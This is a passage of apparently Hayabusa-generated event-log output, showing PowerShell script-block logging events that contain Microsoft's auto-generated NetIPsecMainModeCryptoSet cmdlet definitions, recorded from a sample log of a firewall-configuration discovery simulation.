$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = 
${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
